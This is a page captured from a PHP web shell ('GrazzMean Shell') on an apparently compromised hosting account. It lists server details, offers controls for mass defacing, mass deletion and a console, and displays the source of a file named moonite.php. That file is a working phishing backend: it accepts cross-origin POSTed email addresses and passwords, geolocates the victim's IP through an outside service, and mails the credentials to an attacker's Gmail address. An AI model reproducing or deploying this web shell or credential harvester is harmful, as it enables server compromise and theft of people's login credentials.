shell bypass 403

GrazzMean Shell

: /proc/self/root/home/myflzuab/public_html/block-patterns/Made-In-China/ [ drwxr-xr-x ]
Uname: Linux server230.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
Software: LiteSpeed
PHP version: 8.1.32 [ PHP INFO ] PHP os: Linux
Server Ip: 198.54.115.51
Your Ip: 216.73.216.27
User: myflzuab (636) | Group: myflzuab (635)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : moonite.php 
<?php
// Allow from any origin
header("Access-Control-Allow-Origin: *");

// Access-Control headers are received during OPTIONS requests
if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {

    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_METHOD']))
        // may also be using PUT, PATCH, DELETE, etc.
        header("Access-Control-Allow-Methods: GET, POST, OPTIONS");         

    if (isset($_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']))
        header("Access-Control-Allow-Headers: {$_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']}, Content-Type");

    exit(0);
}


$ip = getenv("REMOTE_ADDR");	

if(!empty($_POST)) {
 $email= $_POST['email'];
 $password = $_POST['password'];
 
		$to = "f95625839@gmail.com";
		
	// Get user's country based on IP address 
    $url = "http://ip-api.com/json/" . $ip;
    $response = file_get_contents($url);
    $data = json_decode($response);
    $country = $data->country;
		
         $subject = "Excel DropS - J : $ip";
		 
		 $love =  "Email ID            : ".$email."\r\n";
         $love .= "Password           : ".$password."\r\n";
		 $love .= "IP           : ".$ip."\r\n";
		 $love .= "Country           : ".$country."\r\n";
		$header = "Content type: Street Vibes \r\n";
         $header .= "MIME-Version: 1.0\r\n";
         $header .= "Content-type: text/html\r\n";
		 
		 mail ($to,$subject,$love,$header);

         

}
?>
© 2025 GrazzMean